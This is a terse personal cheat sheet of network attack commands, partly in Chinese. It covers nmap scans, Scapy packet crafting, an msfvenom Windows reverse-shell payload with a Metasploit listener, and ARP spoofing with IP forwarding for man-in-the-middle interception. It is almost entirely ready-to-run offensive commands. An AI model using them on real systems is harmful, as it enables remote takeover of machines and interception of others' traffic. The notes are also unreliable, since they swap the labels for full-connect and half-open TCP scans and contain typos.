nmap:
Couldn't open a raw socket. Error: Permission denied (13)
ARP
:nmap -sn -PR [IP]
ICMP
:nmap -sn -PE [IP]
TCP
:
- TCP全开
packet = IP(dst)/TCP(sport,dport,flag='S')
- TCP 半开
nmap -sT
nmap -sV
nmap -O
scapy Doc sudo python scapyEx.py
sniff(filter="")
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b '' -f c
msfconsole
>use exploit/multi/handler
>set payloada windows/shell_reverse_tcp
>set lhost
>set lport
>exploit
arpspoof -i eth0 -t drcCheated src
echo 1>>/proc/sys/net/ipv4/ip_forward #转发
Ether()/ARP(psrc=gatewayIP, pdst=victimIP)
Ether()/ARP(psrc=victimIP, pdst=gatewayIP)